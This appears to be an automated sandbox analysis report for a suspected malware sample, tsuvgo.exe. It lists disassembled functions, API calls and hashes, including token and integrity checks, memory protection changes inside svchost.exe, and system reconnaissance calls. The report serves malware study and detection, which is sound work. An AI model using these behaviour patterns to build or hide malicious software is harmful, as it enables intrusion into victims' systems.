Associated: 00000006.00000002.1478209404.0000000000402000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478221254.0000000000403000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478233120.0000000000404000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_tsuvgo.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction ID: de2e74cc2c5d9c26438789ecc4f5efd00e9e3bcaa0604652a6375203050d3e1d
Opcode Fuzzy Hash: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction Fuzzy Hash: E3C04C31449240FBEF015F909B0CB0A7ABDAB84743F008468F149A11A486748944DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00401C79 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,?,00401D53,00001000,00000000,00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C7F
RtlAllocateHeap.NTDLL(00000000,?,00401467,00000000,?,?,?,?,00401295), ref: 00401C86

Memory Dump Source

Source File: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1478183830.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478209404.0000000000402000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478221254.0000000000403000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478233120.0000000000404000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_tsuvgo.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction ID: bbb82e670732032ebf8e303bc8a39f8b906a07d9cff939e05880545c35f94fa9
Opcode Fuzzy Hash: af29794abdbade58b16b445bdb6112b6466faf214ccefe91d731fee372fe0b5d
Instruction Fuzzy Hash: 9EB00275546240EBDE416FE59F0DA097E7DBB84743F008454B349E5064CA758514DB25

Uniqueness

Uniqueness Score: -1.00%

Function 005A03A1 Relevance: 1.6, APIs: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 005A03DA

Memory Dump Source

Source File: 00000006.00000002.1478448077.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5a0000_tsuvgo.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction ID: d01b67735db5a20c22eb43233b34bb1ab1f486084014715de57c60eecb02d768
Opcode Fuzzy Hash: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
Instruction Fuzzy Hash: B401B573A101046BEF208E19DC40B6F7B59FFC6720F299D26E905EB281C574DC0245A0

Uniqueness

Uniqueness Score: -1.00%

Function 00401593 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00401442,00401295), ref: 004015AA

Memory Dump Source

Source File: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1478183830.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478209404.0000000000402000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478221254.0000000000403000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478233120.0000000000404000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_tsuvgo.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction ID: 98ea57f8acb340bf8185d7c41957bfe50ebb8c53553d8a1b8998a7004bdb3259
Opcode Fuzzy Hash: d38c51f324250414f169d42e986cd6cb3458d82db6cc8dc1e70cf848005a2c4a
Instruction Fuzzy Hash: 47D05E33C0830C5ACB04EBF19A0E8CD77FC9B0C214F1004A6E505B2080FA76EA5883A8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401264 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(00000000, /p=,00401033,00000000), ref: 0040126D
StrToIntA.SHLWAPI(-00000004), ref: 0040127B
GetModuleFileNameW.KERNEL32(00000000,C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe,00000104), ref: 004012A1

Strings

C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe, xrefs: 0040129A
/p=, xrefs: 00401264

Memory Dump Source

Source File: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1478183830.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478209404.0000000000402000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478221254.0000000000403000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478233120.0000000000404000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_tsuvgo.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: /p=$C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe
API String ID: 514040917-1827999707
Opcode ID: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction ID: a97e36b21e4f6c4b508bbe1c7bc1ce47f756939332ff9af57f8a63180c09d7ad
Opcode Fuzzy Hash: 2d4bb584e25658cc2728f9be044f66e59ae58770c4c6207fcfe1ce4352e57228
Instruction Fuzzy Hash: EAE048B068130177EA502F719E0FB156A985B08B4FF544476BA45F41F5DAFCC241451D

Uniqueness

Uniqueness Score: -1.00%

Function 004234A8 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 396COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(00432918,0000015C), ref: 0042358F
__aulldiv.LIBCMT ref: 00423916
__common_dcos_data.LIBCMT ref: 0042393C
__common_dcos_data.LIBCMT ref: 00423998

Strings

uT, xrefs: 00423517, 00423545, 0042354B, 0042359B, 00423642, 0042365C, 00423722, 00423842, 00423866, 0042388F, 004238C3, 004238CA, 00423935, 00423961, 00423A0E

Memory Dump Source

Source File: 00000006.00000002.1478325030.0000000000421000.00000040.00000001.01000000.00000006.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_421000_tsuvgo.jbxd

Similarity

API ID: __common_dcos_data$DirectoryWindows__aulldiv
String ID: uT
API String ID: 3713252173-2474181351
Opcode ID: d23a282598ad219914c9b2bdc5d99ce2b0672d1c0f91bb2d386cbf8a1c0af863
Instruction ID: ec485fc663059ce4ae46598323261169b09f174663d50ce322c37d4fa9724364
Opcode Fuzzy Hash: d23a282598ad219914c9b2bdc5d99ce2b0672d1c0f91bb2d386cbf8a1c0af863
Instruction Fuzzy Hash: 76E1D2727003229BC718DF38EDA06E537A2EB98719F59813BD800C73E5E678AD45879D

Uniqueness

Uniqueness Score: -1.00%

Function 00401305 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(NTDLL.DLL,?,0040128B), ref: 0040130B
RtlAllocateHeap.NTDLL ref: 00401387

Strings

NTDLL.DLL, xrefs: 00401306

Memory Dump Source

Source File: 00000006.00000002.1478197214.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1478183830.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478209404.0000000000402000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478221254.0000000000403000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1478233120.0000000000404000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_tsuvgo.jbxd

Yara matches

Similarity

API ID: AllocateHandleHeapModule
String ID: NTDLL.DLL
API String ID: 3205619-1613819793
Opcode ID: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction ID: 661fe251d33bcd873fe0306d0fa480983da9c30ce6244cc3b298440f3ea03910
Opcode Fuzzy Hash: 197974c3615feffb27709de3e24c9eccab4d8452ca4107e1a8abdba4d6cf989d
Instruction Fuzzy Hash: 5E213EA5B9079479E13025761E8EF2759AD85E6F99360817FBB04B21D6D8FC4C04C06C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exePID: 5944, Parent PID: 2436COMMON

Execution Graph

Execution Coverage:	23.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	635
Total number of Limit Nodes:	9

Executed Functions

Function 027E2BA4 Relevance: 3.1, APIs: 2, Instructions: 58nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 027E2BDA
NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 027E2C23

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: f9c694387cf8463984e312ecf34f082b40012e06af632565ad3c19e3fb708207
Instruction ID: 1a52aa0f929f1df0b8c84f51bbadd21dff2aab1cb254e72c9236f4180178a62b
Opcode Fuzzy Hash: f9c694387cf8463984e312ecf34f082b40012e06af632565ad3c19e3fb708207
Instruction Fuzzy Hash: 0911A736910105EFCF09CF98C854EE977B8EF5D324F1542ADE9264F291EB31AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 027E338D Relevance: 19.7, APIs: 13, Instructions: 156
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,0000011C), ref: 027E33BE
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?), ref: 027E33E0
GetLastError.KERNEL32 ref: 027E33E2
GetProcessHeap.KERNEL32(00000008,?), ref: 027E3401
RtlAllocateHeap.NTDLL(00000000), ref: 027E3408
GetTokenInformation.KERNELBASE(?,00000002,00000000,?,?), ref: 027E3428
GetSidIdentifierAuthority.ADVAPI32(?), ref: 027E3448
GetSidSubAuthorityCount.ADVAPI32(?), ref: 027E346B
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 027E3480
GetSidSubAuthority.ADVAPI32(?,?), ref: 027E3497
FindCloseChangeNotification.KERNELBASE(00000000), ref: 027E351A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E3527
HeapFree.KERNEL32(00000000), ref: 027E352E

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: AuthorityHeap$ProcessToken$Information$AllocateChangeCloseCountErrorFindFreeIdentifierLastNotificationOpen
String ID:
API String ID: 3355550324-0
Opcode ID: 8ee80b1844bbb225e81ddd7eb7257353096683898fba29f95c3790ef99c1c13a
Instruction ID: ed3ceccc69336e8613564ccbeabdc1b36899e9f6e408c9b382b3d5b7ddbab52f
Opcode Fuzzy Hash: 8ee80b1844bbb225e81ddd7eb7257353096683898fba29f95c3790ef99c1c13a
Instruction Fuzzy Hash: 7B51BC31544301EFDB128F28D849B7ABBA4FF8E214F188988F48A9B251D731D558CB72

Uniqueness

Uniqueness Score: -1.00%

Function 027E3555 Relevance: 15.1, APIs: 10, Instructions: 76
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 027E3570
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 027E3585
GetLastError.KERNEL32 ref: 027E358B
GetProcessHeap.KERNEL32(00000008,00000001), ref: 027E35A1
RtlAllocateHeap.NTDLL(00000000), ref: 027E35A8
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 027E35C1
GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 027E35CF
FindCloseChangeNotification.KERNELBASE(00000000), ref: 027E35F0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E35FD
HeapFree.KERNEL32(00000000), ref: 027E3604

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessToken$Information$AllocateAuthorityChangeCloseErrorFindFreeLastNotificationOpen
String ID:
API String ID: 1063018014-0
Opcode ID: 3d87dd7b22d517c1248d7151db57d57c87c352711da83e3eec7613f15b14b288
Instruction ID: c8ea8dc3ef7b7d01ba165a369d76f83fa5f3e5321e6408c8522e0d2ee38d84c7
Opcode Fuzzy Hash: 3d87dd7b22d517c1248d7151db57d57c87c352711da83e3eec7613f15b14b288
Instruction Fuzzy Hash: 13215E31940214FBEF254B65DC09BBEBB39EB49756F148599F502DB190C7328A50DB70

Uniqueness

Uniqueness Score: -1.00%

Function 027E2DAF Relevance: 12.1, APIs: 8, Instructions: 72
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,027E51B9,?,027E70E8,00000000,00000000,?), ref: 027E2DC8
GetFileSize.KERNEL32(00000000,00000000,?,?,027E51B9,?,027E70E8,00000000,00000000,?,00000000), ref: 027E2DDC
CloseHandle.KERNEL32(00000000,?,027E51B9,?,027E70E8,00000000,00000000,?,00000000), ref: 027E2E4D

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 470034b840fd870d92bcaaea910c47d0191b1967541180fbecb2a87c1ea98cd5
Instruction ID: 4cdd4f9d8147f9a2c3858826550c6b00627645920d47fd4fde7cfac6e0d9db6d
Opcode Fuzzy Hash: 470034b840fd870d92bcaaea910c47d0191b1967541180fbecb2a87c1ea98cd5
Instruction Fuzzy Hash: 0E116D71A44221EBDF255E60AC48A6BBA6CFB4E661F008919FE42DA140C7308511CB71

Uniqueness

Uniqueness Score: -1.00%

Function 027E4068 Relevance: 12.1, APIs: 8, Instructions: 63
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000009,?,027E373D,?,00100000,00000006,?), ref: 027E406D
RtlAllocateHeap.NTDLL(00000000,?,027E373D), ref: 027E4074
CreateFileMappingW.KERNELBASE(000000FF,027E62B8,00000004,00000000,?,?,?,?,?,027E373D,?,00100000,00000006,?), ref: 027E409B
GetLastError.KERNEL32(?,?,?,027E373D,?,00100000,00000006,?), ref: 027E40A7
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,?,?,?,?,027E373D,?,00100000,00000006,?), ref: 027E40C6
CloseHandle.KERNEL32(00000000,?,?,?,027E373D,?,00100000,00000006,?), ref: 027E40D5
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,027E373D,?,00100000,00000006,?), ref: 027E40DE
HeapFree.KERNEL32(00000000,?,?,?,027E373D,?,00100000,00000006,?), ref: 027E40E5

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$AllocateCloseCreateErrorFreeHandleLastMappingView
String ID:
API String ID: 3951456143-0
Opcode ID: 61008b1c817b9d9930da30db916de2ad990eeb39bb800fe98530eb9b310a4656
Instruction ID: 6b604f0ada5649e11d2601d9c312fafda9939533ff037503334c4948a4c92e56
Opcode Fuzzy Hash: 61008b1c817b9d9930da30db916de2ad990eeb39bb800fe98530eb9b310a4656
Instruction Fuzzy Hash: 97116075684306EFDF248F64AC48F16BBE8EF0C715F018868F656DA291D730D8108B30

Uniqueness

Uniqueness Score: -1.00%

Function 027E1FE9 Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 027E1FF0
CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 027E2009
FindCloseChangeNotification.KERNELBASE(00000000), ref: 027E2014
CloseHandle.KERNEL32 ref: 027E2025

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: CloseCreate$ChangeEventFindHandleNotificationThread
String ID:
API String ID: 3181087867-0
Opcode ID: 075a3b49f10a38a11d6ba36147bd180580e2a76bc75a5c4b53e4a64fe2497ac6
Instruction ID: c211ccfeb1bec60eb1dbc52efa4f70761e0d3327c1ff15210a664f6004770ad5
Opcode Fuzzy Hash: 075a3b49f10a38a11d6ba36147bd180580e2a76bc75a5c4b53e4a64fe2497ac6
Instruction Fuzzy Hash: 41E01A31982231EA9E356B367C0CDC77E6DEF4F2A53018815B80AC8109EB308421D6F0

Uniqueness

Uniqueness Score: -1.00%

Function 027E26ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 027E2709
RtlGetVersion.NTDLL(?), ref: 027E271E

Part of subcall function 027E3641: GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,027E2790), ref: 027E3659

Strings

f<v, xrefs: 027E27BD

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersionmemset
String ID: f<v
API String ID: 487673674-2911902482
Opcode ID: eb2decfd0714d660ecc03be94758d69c46f6f3be209927d17dbd7e64eae27c40
Instruction ID: d0a8174f48703244bbf472daaecdc0e03eb7d63ec0c6460f4a06650673c0f3eb
Opcode Fuzzy Hash: eb2decfd0714d660ecc03be94758d69c46f6f3be209927d17dbd7e64eae27c40
Instruction Fuzzy Hash: D021CF77C852ADDADF119BB4A806AD77FACAB7E310F0488D5DB459B203D2304564CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 027E492A Relevance: 5.1, APIs: 4, Instructions: 62
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000,027E70E8), ref: 027E4982
HeapFree.KERNEL32(00000000,?,00000000,00000000,027E70E8), ref: 027E4989
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,027E70E8), ref: 027E49B1
HeapFree.KERNEL32(00000000,?,00000000,00000000,027E70E8), ref: 027E49B8

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2dd8ca24e3bec53f6ee4088bbf68dca5ffeb1b13ae3fabb2f020403483eee463
Instruction ID: a7dc7b2b34d8e5562dec9be9b1a3a69b6285a997e2fcecccc997fe07ee343c64
Opcode Fuzzy Hash: 2dd8ca24e3bec53f6ee4088bbf68dca5ffeb1b13ae3fabb2f020403483eee463
Instruction Fuzzy Hash: 4011C176944208EBDF14DEA4D858BEEF7BCFB4C305F048555EE45EA140E73096148BB0

Uniqueness

Uniqueness Score: -1.00%

Function 027E2C33 Relevance: 4.6, APIs: 3, Instructions: 74
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE(027E63B4,?), ref: 027E2C67

Part of subcall function 027E55BC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 027E55D3
Part of subcall function 027E55BC: CreateDirectoryW.KERNELBASE(?,027E62B8), ref: 027E561C

Part of subcall function 027E2D40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E2D86
Part of subcall function 027E2D40: RtlFreeHeap.NTDLL(00000000), ref: 027E2D8D

lstrcpyW.KERNEL32(027E63B4,?), ref: 027E2CC7
lstrcatW.KERNEL32(?,027E738C), ref: 027E2CD9

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CreateDirectoryFolderFreePathProcesslstrcatlstrcpy
String ID:
API String ID: 2199617466-0
Opcode ID: 3b25ca09b237f112819083df02d3a013906b5c24d90ec7cd932b7e72c484a347
Instruction ID: a10a7bd96d50dde96adc7844c2af3d1fa149aac1d037defe14f228ec5f9dd135
Opcode Fuzzy Hash: 3b25ca09b237f112819083df02d3a013906b5c24d90ec7cd932b7e72c484a347
Instruction Fuzzy Hash: 2621F7B294021C9FDF21DFA4DC49BDA77BDAF0D314F4005A6EA0AD6151EB309A588F71

Uniqueness

Uniqueness Score: -1.00%

Function 027E2833 Relevance: 4.6, APIs: 3, Instructions: 73
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExW.KERNELBASE(00000000,?,?,?,00000005), ref: 027E2858
LookupAccountNameW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 027E287E
GetSystemTimeAsFileTime.KERNEL32(?,?,00000005), ref: 027E28A3

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: NameTime$AccountComputerFileLookupSystem
String ID:
API String ID: 3076100934-0
Opcode ID: 4c8417244372383c7de7622b59072791a7c2b42a4587e57ce1e3abd13c983b04
Instruction ID: 428f647d6f97b7695a20ea71bbaccb80a9330391c8c16157cd0d79edfb841240
Opcode Fuzzy Hash: 4c8417244372383c7de7622b59072791a7c2b42a4587e57ce1e3abd13c983b04
Instruction Fuzzy Hash: 8E213E72941248DFDF65CF69E8849DB7BACEF09214B104516FD25D7242D730D91ACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 027E5108 Relevance: 4.6, APIs: 3, Instructions: 52
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 027E54AC: SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 027E54C0
Part of subcall function 027E54AC: CreateDirectoryW.KERNELBASE(00000000,027E62B8), ref: 027E5500

CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 027E513A
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 027E515E
CloseHandle.KERNEL32(00000000), ref: 027E5167

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: CreateFile$CloseDirectoryFolderHandlePathRead
String ID:
API String ID: 221032062-0
Opcode ID: 58933556b1a7366cfb5750d556ca56e68374ed7634f372a271052858ff4c9314
Instruction ID: afafa742ef4cffc93656eef5d98804be118230742e94bfc02966eb3bbb1f16ee
Opcode Fuzzy Hash: 58933556b1a7366cfb5750d556ca56e68374ed7634f372a271052858ff4c9314
Instruction Fuzzy Hash: 8C01DB7264430CBFDA305A60FC48F6BB79CE78E768F508A29FA52D6080E73155048671

Uniqueness

Uniqueness Score: -1.00%

Function 027E2EBA Relevance: 4.5, APIs: 3, Instructions: 45
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,027E2D76,?,?,?,?), ref: 027E2ED5
WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,?,?,027E2D76,?,?,?,?,?), ref: 027E2EF4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,027E2D76,?,?,?,?,?), ref: 027E2EFD

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 108073bc3aa68de50e2bd8f9dfd21963408fcdd35ffee9ccda13104319261612
Instruction ID: 21fb059e9e428ccca128525071cbce40ea094c2c469bc15a53acd9b4952ce3a5
Opcode Fuzzy Hash: 108073bc3aa68de50e2bd8f9dfd21963408fcdd35ffee9ccda13104319261612
Instruction Fuzzy Hash: 41F0C232A45118FBDF205961AC48FABBA6CEB4E6B4F004625FD06D7082D7304D0082F0

Uniqueness

Uniqueness Score: -1.00%

Function 027E2D40 Relevance: 4.5, APIs: 3, Instructions: 43
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 027E2DAF: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,027E51B9,?,027E70E8,00000000,00000000,?), ref: 027E2DC8

CopyFileW.KERNEL32(?,?,00000000), ref: 027E2DA5

Part of subcall function 027E2EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,027E2D76,?,?,?,?), ref: 027E2ED5

GetProcessHeap.KERNEL32(00000000,00000000), ref: 027E2D86
RtlFreeHeap.NTDLL(00000000), ref: 027E2D8D

Memory Dump Source

Source File: 0000000F.00000002.3295659551.00000000027E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 027E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_27e1000_svchost.jbxd

Yara matches

Similarity

API ID: File$CreateHeap$CopyFreeProcess
String ID:
API String ID: 2735472767-0
Opcode ID: 76c10fe59482de602712bcd054479f78a63fbbda31ec20652214b8a9bfa67197
Instruction ID: adc282db5d8e7d0a2e7eb389b084841f5c433ea81c5ca8178cb33270547c74e7
Opcode Fuzzy Hash: 76c10fe59482de602712bcd054479f78a63fbbda31ec20652214b8a9bfa67197
Instruction Fuzzy Hash: B8014F72800118FBCF12AB95DC08FDDBB3DEB08351F1045A1FE0AA5111D7328B60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 027E2674 Relevance: 4.5, APIs: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008007), ref: 027E2679

Part of subcall function 027E2973: lstrcpyW.KERNEL32(027E62F2,027E63B4), ref: 027E298C
Part of subcall function 027E2973: lstrcatW.KERNEL32(027E62F0,027E7338), ref: 027E299C
Part of subcall function 027E2973: SetUnhandledExceptionFilter.KERNEL32(Function_000017E8), ref: 027E29A7

Part of subcall function 027E26ED: memset.MSVCRT ref: 027E2709
Part of subcall function 027E26ED: RtlGetVersion.NTDLL(?), ref: 027E271E

Part of subcall function 027E3555: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 027E3570
